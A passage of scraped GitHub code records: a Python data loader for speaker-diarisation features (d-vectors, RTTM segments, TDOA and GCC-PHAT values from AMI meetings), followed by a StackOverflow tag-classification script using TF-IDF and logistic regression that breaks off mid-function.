+{"seq_id": "6883091896", "text": "\"\"\"Loading meeting, segmentation and TDOA data from scp, rttm and del files.\"\"\"\n\nfrom functools import partial\nfrom multiprocessing.sharedctypes import Value\nfrom typing import List\nimport kaldiio\nimport numpy as np\nfrom collections import defaultdict\nimport os\nfrom copy import deepcopy\n\nfrom torch import float32\nimport configargparse\n\nnp.set_printoptions(threshold=np.inf)\n\ndef open_rttm(rttm_path):\n \"\"\"Open rttm file containing segmentation data.\n\n :param: str rttm_path: path to rttm file\n :return: List[List[str]] segments_desc_list: list of each line of the file as a lists of strings\n \"\"\"\n with open(rttm_path, \"r\") as rttm_file:\n segments_desc_list = [(line.strip()).split() for line in rttm_file]\n return segments_desc_list\n\n\ndef build_segment_desc_dict(rttm_path, filt=True):\n \"\"\"Build dictionary segment_desc_dict.\n\n :param: str rttm_path: path to rttm file\n :return: dict segment_desc_dict[meeting_id] = List(Tuple(start_index, end_index, speaker_label,\n start_time, end_time, duration))\n \"\"\"\n segment_desc_dict = defaultdict(list)\n removed_segs_dict = defaultdict(list)\n segments_desc_list = open_rttm(rttm_path)\n for segment_desc in segments_desc_list:\n meeting_id = segment_desc[1]\n try:\n start_index = int(segment_desc[5])\n except ValueError: # if ''\n start_index = segment_desc[5]\n try:\n end_index = int(segment_desc[6])\n except ValueError: # if ''\n end_index = segment_desc[6]\n speaker_label = segment_desc[7]\n start_time = round(float(segment_desc[3]), 2)\n duration = round(float(segment_desc[4]), 2)\n end_time = round(start_time + duration, 2)\n segment_desc_dict[meeting_id].append((start_index, end_index, speaker_label,\n start_time, end_time, duration))\n if filt:\n for meeting_id, segment_descs in segment_desc_dict.items(): # filter encompassed segments\n segment_desc_dict[meeting_id], removed_segs_dict[meeting_id] = filter_encompassed_segments(segment_descs)\n return segment_desc_dict, removed_segs_dict\n\n\ndef open_scp(scp_path):\n \"\"\"Open scp file containing paths to meeting d-vectors and return numpy array.\n\n :param: str scp_path: path to scp file\n :return: List[List[str]] meeting_path_lists: List of Lists [meeting_id, path_to_ark_file]\n \"\"\"\n with open(scp_path, \"r\") as scp_file:\n meeting_path_lists = [(line.strip()).split() for line in scp_file]\n return meeting_path_lists\n\n\ndef build_global_dvec_dict(args, dataset, split=False, tdoa=False, gccphat=False):\n \"\"\"Builds global d-vector dictionary (d-vectors from across all meetings)\n \n :param: str dataset: \"train\", \"dev\", or \"eval\"\n :param: Bool split: splits segments longer than 2s if True\n :return: dict global_dvec_dict[speaker_label] = List[dvector] where dvector is 32-D np array\n \"\"\"\n\n scp_path, rttm_path = get_file_paths(args, dataset)\n global_dvec_dict = {}\n meeting_path_lists = open_scp(scp_path)\n segment_desc_dict, _ = build_segment_desc_dict(rttm_path)\n for meeting_path_list in meeting_path_lists: # iterate through meetings\n meeting_id = meeting_path_list[0]\n meeting_path = meeting_path_list[1]\n meeting_dvectors_array = kaldiio.load_mat(meeting_path)\n for segment_desc in segment_desc_dict[meeting_id]:\n start_index = segment_desc[0]\n end_index = segment_desc[1]\n segment = meeting_dvectors_array[start_index:end_index]\n speaker = segment_desc[2]\n if split:\n # split segments longer than 2s to give more training examples\n num_subsegments = max(1, len(segment) // 100)\n subsegments = np.array_split(segment, num_subsegments)\n else:\n subsegments = [segment]\n for subsegment in subsegments:\n averaged_subsegment = np.mean(subsegment, axis=0)\n averaged_subsegment = averaged_subsegment/np.linalg.norm(averaged_subsegment)\n if speaker not in global_dvec_dict:\n global_dvec_dict[speaker] = [averaged_subsegment]\n else:\n global_dvec_dict[speaker].append(averaged_subsegment)\n\n return global_dvec_dict\n\n\ndef build_meeting_dvec_dict(args, dataset, split=False, tdoa=False, gccphat=False):\n \"\"\"Build meeting-level d-vector dictionary (dictionary of dictionaries, one per meeting).\n \n :param: str dataset: \"train\", \"dev\", or \"eval\"\n :param: Bool split: splits segments longer than 2s if True\n :return: dict meeting_dvec_dict[meeting_id] = {speaker_label: List[dvector]}\n \"\"\"\n print(\"Building meeting_dvec_dict\")\n scp_path, rttm_path = get_file_paths(args, dataset)\n meeting_dvec_dict = {}\n meeting_path_lists = open_scp(scp_path)\n segment_desc_dict, _ = build_segment_desc_dict(rttm_path)\n for meeting_path_list in meeting_path_lists: # iterate through meetings\n inner_dvec_dict = {} # to be a value in meeting_dvec_dict (defaultdict for numpy array?)\n meeting_id = meeting_path_list[0]\n meeting_path = meeting_path_list[1]\n meeting_dvectors_array = kaldiio.load_mat(meeting_path)\n for segment_desc in segment_desc_dict[meeting_id]:\n start_index = segment_desc[0]\n end_index = segment_desc[1]\n segment = meeting_dvectors_array[start_index:end_index]\n speaker = segment_desc[2]\n if split:\n # split segments longer than 2s to give more training examples\n num_subsegments = max(1, len(segment) // 100)\n subsegments = np.array_split(segment, num_subsegments)\n else:\n subsegments = [segment]\n for subsegment in subsegments:\n averaged_subsegment = np.mean(subsegment, axis=0)\n averaged_subsegment = averaged_subsegment/np.linalg.norm(averaged_subsegment)\n if speaker not in inner_dvec_dict:\n inner_dvec_dict[speaker] = [averaged_subsegment]\n else:\n inner_dvec_dict[speaker].append(averaged_subsegment)\n meeting_dvec_dict[meeting_id] = inner_dvec_dict\n return meeting_dvec_dict\n\n\ndef build_segment_dicts(args, dataset, filt=True, emb=\"dvec\", tdoa=False, gccphat=False, average=True, tdoa_norm=False):\n \"\"\"Build averaged_segmented_meetings_dict and segmented_speakers_dict (labels).\n\n :param: str dataset: \"train\", \"dev\", or \"eval\"\n :param: Bool filt: apply filtered_encomassed_segments\n :param: Bool dvec: include d-vectors\n :param: Bool tdoa: include TDOA values\n :param: Bool gccphat: include GCC-PHAT values\n :param: Bool average: average segments or leave as array\n :return: dict segmented_meetings_dict[meeting_id] = List[dvector] (Sequence of segments\n for each meeting. Each vector has some combination of dvec, tdoa, gccphat in that order)\n :return: dict segmented_speakers_dict[meeting_id] = List[str] (Sequence of speaker labels for each\n meeting)\n \"\"\"\n print(\"Building segment dicts\", 'emb: ' + emb, 'tdoa: ' + str(tdoa), 'gccphat: ' + str(gccphat), 'average: ' + str(average))\n # np_path is path to directory of numpy files, one per meeting\n emb_path, rttm_path = get_file_paths(args, dataset)\n # create two dictionaries with key as meeting_id:\n segmented_speakers_dict = {} # value is array of speakers aligning with segments\n segmented_meetings_dict = {} # value is array of segments. Each segment is 1 d-vector\n segment_desc_dict, removed_segs_dict = build_segment_desc_dict(rttm_path, filt=filt)\n\n if tdoa == True or gccphat == True:\n tdoas, gccphats = get_tdoa_gccphat(args, segment_desc_dict.keys(), norm=tdoa_norm)\n\n if emb == \"wav2vec2\":\n meeting_files_list = os.listdir(emb_path) # list of names of files in embedding directory\n meeting_files_list.remove(\"%s150.csv\" % dataset)\n for meeting_file in meeting_files_list: # iterate through meetings\n meeting_id = \"AMIMDM-\" + meeting_file[:-4] # NB: AMIMDM- prefix added\n meeting_path = emb_path + '/' + meeting_file\n meeting_vectors = np.load(meeting_path, allow_pickle=True)\n # filter encompassed segments\n meeting_vectors = np.delete(meeting_vectors, removed_segs_dict[meeting_id], axis=0)\n meeting = meeting_vectors\n\n speakers = []\n meeting_tdoas = []\n meeting_gccphats = []\n for segment_index, segment_desc in enumerate(segment_desc_dict[meeting_id]):\n start_index = segment_desc[0]\n end_index = segment_desc[1]\n speaker = segment_desc[2]\n speakers.append(speaker)\n\n # L2 normalise\n meeting_vectors[segment_index] = meeting_vectors[segment_index]/np.linalg.norm(meeting_vectors[segment_index])\n\n # concatenate arrays, ignore final repeated/padding TDOA and GCC-PHAT values\n if tdoa == True:\n tdoa_segment = tdoas[meeting_id][start_index:end_index]\n meeting_tdoas.append(np.mean(tdoa_segment, axis=0))\n if gccphat == True:\n meeting_gccphats.append(np.mean(gccphats[meeting_id][start_index:end_index], axis=0))\n \n if tdoa == True:\n meeting_tdoas = np.array(meeting_tdoas)\n meeting = np.concatenate((meeting, meeting_tdoas), axis=1, dtype=np.float32)\n if gccphat == True:\n meeting_gccphats = np.array(meeting_gccphats)\n meeting = np.concatenate((meeting, meeting_gccphats), axis=1, dtype=np.float32)\n\n segmented_meetings_dict[meeting_id] = meeting.astype(np.float32)\n segmented_speakers_dict[meeting_id] = speakers\n assert(len(speakers) == len(meeting))\n\n elif emb == \"dvec\" or emb == \"None\": # unchanged from tdoa branch\n meeting_path_lists = open_scp(emb_path)\n for meeting_path_list in meeting_path_lists: # iterate through meetings\n meeting_id = meeting_path_list[0]\n meeting_path = meeting_path_list[1]\n if emb == \"dvec\":\n meeting_dvectors = kaldiio.load_mat(meeting_path)\n dvec_dim = meeting_dvectors.shape[1] # 32\n meeting = meeting_dvectors\n\n # concatenate arrays, ignore final repeated/padding TDOA and GCC-PHAT values\n if tdoa == True:\n if emb == \"dvec\":\n meeting_tdoas = tdoas[meeting_id][:len(meeting)]\n meeting = np.concatenate((meeting, meeting_tdoas), axis=1, dtype=np.float32)\n else:\n meeting = np.array(tdoas[meeting_id][:-12], dtype=np.float32)\n if gccphat == True:\n if emb == \"dvec\" or tdoa == True:\n meeting_gccphats = gccphats[meeting_id][:len(meeting)]\n meeting = np.concatenate((meeting, meeting_gccphats), axis=1, dtype=np.float32)\n else:\n meeting = np.array(gccphats[meeting_id][:-12], dtype=np.float32)\n\n speakers = []\n segments = []\n for segment_desc in segment_desc_dict[meeting_id]:\n start_index = segment_desc[0]\n end_index = segment_desc[1]\n segment = meeting[start_index:end_index]\n # take average regardless of data included\n if average == True:\n segment = np.mean(segment, axis=0)\n # only L2-normalise dvec part\n if emb == \"dvec\":\n segment[:dvec_dim] = segment[:dvec_dim]/np.linalg.norm(segment[:dvec_dim])\n # only do variance normalisation here for eval as otherwise done in data_aug.py\n if dataset == 'eval':\n segment[:dvec_dim] *= np.sqrt(dvec_dim)\n speaker = segment_desc[2]\n speakers.append(speaker)\n segments.append(segment)\n assert(len(segments) == len(speakers))\n segmented_meetings_dict[meeting_id] = segments\n segmented_speakers_dict[meeting_id] = speakers\n \n else:\n raise ValueError(\"emb invalid\")\n\n\n return segmented_meetings_dict, segmented_speakers_dict\n\n\ndef get_file_paths(args, dataset):\n \"\"\"Get path for chosen dataset.\n Dataset can be either 'train' or 'dev'.\n \"\"\"\n if dataset == 'train':\n emb_path = args.train_emb\n rttm_path = args.train_rttm\n elif dataset == 'dev':\n emb_path = args.valid_emb\n rttm_path = args.valid_rttm\n elif dataset == 'eval':\n emb_path = args.eval_emb\n rttm_path = args.eval_rttm\n else:\n raise ValueError(\"Expected dataset argument to be 'train', 'dev' or 'eval\")\n return emb_path, rttm_path\n\n\ndef filter_encompassed_segments(_seg_list):\n \"\"\"Remove segments completely contained within another one based on time (not indices).\n Takes segment_desc_list from build_segment_desc_dict()\n\n :param: _seg_list np.array(segment_information)\n :return: seg_list np.array(segment_information)\n \"\"\"\n unsorted_seg_list = deepcopy(_seg_list)\n _seg_list.sort(key=lambda tup: tup[3])\n seg_list = []\n removed_seg_indices = []\n for segment in _seg_list:\n start_time = segment[3]\n end_time = segment[4]\n start_before = [_seg for _seg in _seg_list if _seg[3] <= start_time]\n end_after = [_seg for _seg in _seg_list if _seg[4] >= end_time]\n start_before.remove(segment)\n end_after.remove(segment)\n if set(start_before).isdisjoint(end_after):\n seg_list.append(segment)\n else:\n removed_seg_indices += [i for i, x in enumerate(unsorted_seg_list) if x == segment]\n \n return seg_list, removed_seg_indices\n\n\ndef get_tdoa_gccphat(args, meeting_ids, norm=False):\n \"\"\"Returns two dicts storing TDOA and GCC-PHAT values for meetings in a dataset.\n \n :param: str args.directory_path: path to directory containing del files\n :param: List[str] meeting_ids: list of meeting_ids to get data for\n :param: Bool norm: if True, normalise values at corpus level for have zero mean and unit variance\n\n :return: dict tdoas[meeting_id] = List[np.array(int)] Each entry in list is a vector\n of TDOA values aligned with d-vectors.\n :return: dict gccphats[meeting_id] = List[np.array(float)] Each entry in list is a vector\n of GCC-PHAT values aligned with d-vectors. \n \"\"\"\n print('Getting TDOA/GCCPHAT data')\n directory_path = args.tdoa_directory\n\n tdoas = defaultdict(list)\n gccphats = defaultdict(list)\n\n # all_tdoa_vecs = []\n # all_gccphat_vecs = []\n\n for meeting_id in meeting_ids:\n partial_meeting_id = meeting_id[8:]\n with open(directory_path + '/' + partial_meeting_id + '.del', 'r') as delays:\n delays_list = [(line.strip()).split() for line in delays]\n for delay in delays_list:\n # ignore second channel as that is fixed reference (always 0 1.000000)\n tdoa_vec = np.array([int(delay[2]), int(delay[6]), int(delay[8]), int(delay[10]),\n int(delay[12]), int(delay[14]), int(delay[16])])\n gccphat_vec = np.array([float(delay[3]), float(delay[7]), float(delay[9]), float(delay[11]),\n float(delay[13]), float(delay[15]), float(delay[17])])\n tdoas[meeting_id].append(tdoa_vec)\n gccphats[meeting_id].append(gccphat_vec)\n # all_tdoa_vecs.append(tdoa_vec)\n # all_gccphat_vecs.append(gccphat_vec)\n\n tdoas[meeting_id] = np.array(tdoas[meeting_id], dtype=np.float32)\n gccphats[meeting_id] = np.array(gccphats[meeting_id], dtype=np.float32)\n\n if norm == True:\n # all_tdoa_vecs = np.array(all_tdoa_vecs, dtype=np.float32)\n # all_gccphat_vecs = np.array(all_gccphat_vecs, dtype=np.float32)\n # tdoa_mean = np.mean(all_tdoa_vecs, axis=0) # mean vector \n # gccphat_mean = np.mean(all_gccphat_vecs, axis=0)\n # tdoa_std = np.std(all_tdoa_vecs, axis=0) # standard deviation vector\n # gccphat_std = np.std(all_gccphat_vecs, axis=0)\n\n # hard code stats from get_tdoa_gccphat_stats to save time (from train set)\n tdoa_mean = np.array([0.20190075, -0.05194093, 0.14035095, 0.52727616, 0.8346257, 1.0925584, 0.83129424], dtype=np.float32)\n tdoa_std = np.array([2.0948744, 2.3241794, 5.6177387, 5.9525986, 6.925673, 5.7009034, 4.0400524], dtype=np.float32)\n gccphat_mean = np.array([0.27077588, 0.26317957, 0.24773844, 0.23016952, 0.22052345, 0.21291934, 0.23988448], dtype=np.float32)\n gccphat_std = np.array([0.14447168, 0.13321947, 0.12776719, 0.12591319, 0.13311823, 0.12614751, 0.1267838] , dtype=np.float32)\n for meeting_id in tdoas:\n # normalise so data has zero mean and unit variance\n tdoas[meeting_id] = np.divide((tdoas[meeting_id] - tdoa_mean), tdoa_std)\n gccphats[meeting_id] = np.divide((gccphats[meeting_id] - gccphat_mean), gccphat_std)\n\n return tdoas, gccphats\n\n\ndef get_parser(): # debugging only, official paths should be maintained in asr_train.py\n parser = configargparse.ArgumentParser(\n description=\"Load speech data\",\n config_file_parser_class=configargparse.YAMLConfigFileParser,\n formatter_class=configargparse.ArgumentDefaultsHelpFormatter)\n\n # TODO: NB: back to segment level for debugging\n parser.add_argument('--train-scp', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/arks.concat/train.scp\", help='')\n parser.add_argument('--valid-scp', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/arks.meeting.cmn.tdnn/dev.scp\", help='')\n\n parser.add_argument('--train-np', type=str,\n default=\"/home/mifs/epcl2/project/embeddings/james/train\", help='')\n\n parser.add_argument('--eval-emb', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/arks.meeting.cmn.tdnn/eval.scp\", help='')\n parser.add_argument('--eval-rttm', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/window_level_rttms/eval150_window_level.rttm\", help='')\n # parser.add_argument('--eval-emb', type=str,\n # default=\"/home/mifs/epcl2/project/embeddings/james/eval\", help='')\n # parser.add_argument('--eval-rttm', type=str,\n # default=\"/home/mifs/jhrt2/newDNC/data/rttms.concat/eval.rttm\", help='')\n\n parser.add_argument('--train-rttm', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/rttms.concat/train.rttm\", help='')\n parser.add_argument('--valid-rttm', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/rttms.concat/dev.rttm\", help='')\n parser.add_argument('--tdoa-directory', type=str,\n default=\"/data/mifs_scratch/jhrt2/BeamformIt/MDM_AMI_fixedref_10\", help='')\n return parser\n\ndef main():\n parser = get_parser()\n args, _ = parser.parse_known_args()\n dataset = 'eval'\n\n meetings, speakers = build_segment_dicts(args, dataset, filt=True, emb=\"None\", tdoa=True, gccphat=False, average=True)\n\n meeting_id = \"AMIMDM-0TS3003a\"\n meeting_id = \"AMIMDM-0EN2002b\"\n print(meeting_id)\n TDOAS = []\n first_speaker = speakers[meeting_id][0]\n for segment_index in range(len(meetings[meeting_id])):\n if speakers[meeting_id][segment_index] == first_speaker:\n # print(meetings[meeting_id][segment_index])\n TDOAS.append(meetings[meeting_id][segment_index])\n \n TDOAS = np.array(TDOAS)\n print(np.std(TDOAS, axis=0))\n \n\n\nif __name__ == '__main__':\n main()\n\n", "repo_name": "jamest08/newDNC", "sub_path": "espnet/data_prep/data_loading.py", "file_name": "data_loading.py", "file_ext": "py", "file_size_in_byte": 20003, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.set_printoptions", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 15, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 35, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 36, "usage_type": "call"}, {"api_name": "kaldiio.load_mat", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array_split", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 100, "usage_type": "attribute"}, {"api_name": "kaldiio.load_mat", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.array_split", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 139, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 194, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 205, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 210, "usage_type": "attribute"}, {"api_name": "kaldiio.load_mat", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 228, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 230, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 234, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 236, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 249, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 252, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 292, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 326, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 347, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 348, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 359, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 359, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 360, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 361, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 362, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 362, "usage_type": "attribute"}, {"api_name": "numpy.divide", "line_number": 365, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 366, "usage_type": "call"}, {"api_name": "configargparse.ArgumentParser", "line_number": 372, "usage_type": "call"}, {"api_name": "configargparse.YAMLConfigFileParser", "line_number": 374, "usage_type": "attribute"}, {"api_name": "configargparse.ArgumentDefaultsHelpFormatter", "line_number": 375, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 420, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 421, "usage_type": "call"}]}
+{"seq_id": "36934292472", "text": "# Predict tags for posts from StackOverflow. To solve this task you will use multilabel classification approach.\n#\n# Libraries\n#\n# Numpy — a package for scientific computing.\n# Pandas — a library providing high-performance, easy-to-use data structures and data analysis tools for the Python\n# scikit-learn — a tool for data mining and data analysis.\n# NLTK — a platform to work with natural language.\n\n\nimport sys\nimport nltk\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\n\nfrom ast import literal_eval\nimport pandas as pd\nimport numpy as np\nimport re\n\ndef read_data(filename):\n data = pd.read_csv(filename, sep='\\t')\n data['tags'] = data['tags'].apply(literal_eval)\n return data\n\ntrain = read_data('data/train.tsv')\nvalidation = read_data('data/validation.tsv')\ntest = pd.read_csv('data/test.tsv', sep='\\t')\n\nX_train, y_train = train['title'].values, train['tags'].values\nX_val, y_val = validation['title'].values, validation['tags'].values\nX_test = test['title'].values\n\n\nREPLACE_BY_SPACE_RE = re.compile('[/(){}\\[\\]\\|@,;]')\nBAD_SYMBOLS_RE = re.compile('[^0-9a-z #+_]')\nSTOPWORDS = set(stopwords.words('english'))\n\n\ndef text_prepare(text):\n \"\"\"\n text: a string\n\n return: modified initial string\n \"\"\"\n text = text.lower() # lowercase text\n text = REPLACE_BY_SPACE_RE.sub(' ', text) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub('', text) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join([word for word in text.split() if word not in (STOPWORDS)]) # delete stopwords from text\n\n return text\n\n\n\nX_train = [text_prepare(x) for x in X_train]\nX_val = [text_prepare(x) for x in X_val]\nX_test = [text_prepare(x) for x in X_test]\n\ntags_counts = {}\n# Dictionary of all words from train corpus with their counts.\nwords_counts = {}\n\n# ' '.join(X_train[:3])\nrx = re.compile('([\\[\\],\\'\\'])')\nrx.sub('', ' '.join(str(v) for v in y_train[:10])).split(' ')\n\n\nfrom collections import Counter\ntags_counts = Counter(rx.sub('', ' '.join(str(v) for v in y_train)).split(' '))\nwords_counts = Counter(' '.join(X_train).split(' '))\n\n\n\n\nsorted_words = sorted(words_counts.items(), key=lambda x: x[1], reverse=True)[:5000]\n\n\n\n\nDICT_SIZE = 5000\nsorted_words = sorted(words_counts.items(), key=lambda x: x[1], reverse=True)[:DICT_SIZE]\nINDEX_TO_WORDS = dict(enumerate(list(dict(sorted_words).keys())))\nWORDS_TO_INDEX = dict(zip(INDEX_TO_WORDS.values(), INDEX_TO_WORDS.keys()))\n\nALL_WORDS = WORDS_TO_INDEX.keys()\n\n\ndef my_bag_of_words(text, words_to_index, dict_size):\n \"\"\"\n text: a string\n dict_size: size of the dictionary\n\n return a vector which is a bag-of-words representation of 'text'\n \"\"\"\n result_vector = np.zeros(dict_size)\n for each_word in text.split():\n # print(each_word)\n if (each_word in words_to_index.keys()):\n result_vector[words_to_index.get(each_word)] = result_vector[words_to_index.get(each_word)] + 1\n\n return result_vector\n\ndef test_my_bag_of_words():\n words_to_index = {'hi': 0, 'you': 1, 'me': 2, 'are': 3}\n examples = ['hi how are you']\n answers = [[1, 1, 0, 1]]\n for ex, ans in zip(examples, answers):\n if (my_bag_of_words(ex, words_to_index, 4) != ans).any():\n return \"Wrong answer for the case: '%s'\" % ex\n return 'Basic tests are passed.'\n\nprint(test_my_bag_of_words())\n\nfrom scipy import sparse as sp_sparse\n\nX_train_mybag = sp_sparse.vstack([sp_sparse.csr_matrix(my_bag_of_words(text, WORDS_TO_INDEX, DICT_SIZE)) for text in X_train])\nX_val_mybag = sp_sparse.vstack([sp_sparse.csr_matrix(my_bag_of_words(text, WORDS_TO_INDEX, DICT_SIZE)) for text in X_val])\nX_test_mybag = sp_sparse.vstack([sp_sparse.csr_matrix(my_bag_of_words(text, WORDS_TO_INDEX, DICT_SIZE)) for text in X_test])\nprint('X_train shape ', X_train_mybag.shape)\nprint('X_val shape ', X_val_mybag.shape)\nprint('X_test shape ', X_test_mybag.shape)\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ndef tfidf_features(X_train, X_val, X_test):\n \"\"\"\n X_train, X_val, X_test — samples\n return TF-IDF vectorized representation of each sample and vocabulary\n \"\"\"\n # Create TF-IDF vectorizer with a proper parameters choice\n # Fit the vectorizer on the train set\n # Transform the train, test, and val sets and return the result\n\n\n tfidf_vectorizer = TfidfVectorizer(min_df=5, max_df=0.9, ngram_range=(1, 2), use_idf=True, token_pattern=r'(\\S+)')\n\n X_train = tfidf_vectorizer.fit_transform(X_train)\n X_test = tfidf_vectorizer.transform(X_test)\n X_val = tfidf_vectorizer.transform(X_val)\n\n return X_train, X_val, X_test, tfidf_vectorizer.vocabulary_\n\n\nX_train_tfidf, X_val_tfidf, X_test_tfidf, tfidf_vocab = tfidf_features(X_train, X_val, X_test)\ntfidf_reversed_vocab = {i:word for word,i in tfidf_vocab.items()}\n\nprint('c#' in tfidf_reversed_vocab.values())\nprint('c++' in tfidf_reversed_vocab.values())\n\n\n\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\nmlb = MultiLabelBinarizer(classes=sorted(tags_counts.keys()))\ny_train = mlb.fit_transform(y_train)\ny_val = mlb.fit_transform(y_val)\n\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.linear_model import LogisticRegression\n\n\n# from sklearn.utils import class_weight\n# # In order to calculate the class weight do the following\n#\n# class_weights = class_weight.compute_class_weight('balanced',\n# np.unique(y_train),\n# y_train)\n\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import GridSearchCV\n\n#\n# def train_classifier(X_train, y_train):\n# \"\"\"\n# X_train, y_train — training data\n#\n# return: trained classifier\n# \"\"\"\n# # scaler = StandardScaler(with_mean=False)\n# # scaler.fit(X_train)\n#\n# # Create and fit LogisticRegression wraped into OneVsRestClassifier.\n# # clf = OneVsRestClassifier(LogisticRegression(C=1, multi_class='ovr', max_iter=1000, solver='liblinear',\n# # class_weight='balanced'))\n# model_to_set = OneVsRestClassifier(LogisticRegression(C =1, penalty='l1', class_weight='balanced'))\n#\n# # Create regularization penalty space\n# # Create regularization hyperparameter space\n#\n# parameters = {\n# \"estimator__C\": [0.1, 1, 10, 100],\n# \"estimator__penalty\": [\"l1\", \"l2\"],\n# \"estimator__class_weight\": [None,'balanced'],\n# }\n#\n# clf = GridSearchCV(model_to_set, param_grid=parameters,scoring='f1_weighted', verbose=4, n_jobs=-1)\n#\n# clf.fit(X_train, y_train)\n#\n# return clf #, scaler\n\n\n\n\ndef train_classifier(X_train, y_train):\n \"\"\"\n X_train, y_train — training data\n\n return: trained classifier\n \"\"\"\n # scaler = StandardScaler(with_mean=False)\n # scaler.fit(X_train)\n\n # Create and fit LogisticRegression wraped into OneVsRestClassifier.\n clf = OneVsRestClassifier(LogisticRegression(C=1, class_weight=None, penalty='l1'))\n clf.fit(X_train, y_train)\n\n return clf #, scaler\n\n\n\nclassifier_mybag = train_classifier(X_train_mybag, y_train)\nclassifier_tfidf = train_classifier(X_train_tfidf, y_train)\n\ny_val_predicted_labels_mybag = classifier_mybag.predict(X_val_mybag)\ny_val_predicted_scores_mybag = classifier_mybag.decision_function(X_val_mybag)\n\ny_val_predicted_labels_tfidf = classifier_tfidf.predict(X_val_tfidf)\ny_val_predicted_scores_tfidf = classifier_tfidf.decision_function(X_val_tfidf)\n\n\ny_val_pred_inversed = mlb.inverse_transform(y_val_predicted_labels_tfidf)\ny_val_inversed = mlb.inverse_transform(y_val)\nfor i in range(3):\n print('Title:\\t{}\\nTrue labels:\\t{}\\nPredicted labels:\\t{}\\n\\n'.format(\n X_val[i],\n ','.join(y_val_inversed[i]),\n ','.join(y_val_pred_inversed[i])\n ))\n\n\n\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score\n\n\ndef print_evaluation_scores(y_val, predicted):\n print(f1_score(y_val, predicted, average=\"weighted\"))\n print(precision_score(y_val, predicted, average=\"weighted\"))\n print(recall_score(y_val, predicted, average=\"weighted\"))\n print(accuracy_score(y_val, predicted))\n\n\nprint('Bag-of-words')\nprint_evaluation_scores(y_val, y_val_predicted_labels_mybag)\nprint('Tfidf')\nprint_evaluation_scores(y_val, y_val_predicted_labels_tfidf)\n\n\n\ntest_predictions = classifier_tfidf.predict(X_test_tfidf)\ntest_pred_inversed = mlb.inverse_transform(test_predictions)\n\n\ndef print_words_for_tag(classifier, tag, tags_classes, index_to_words, all_words):\n 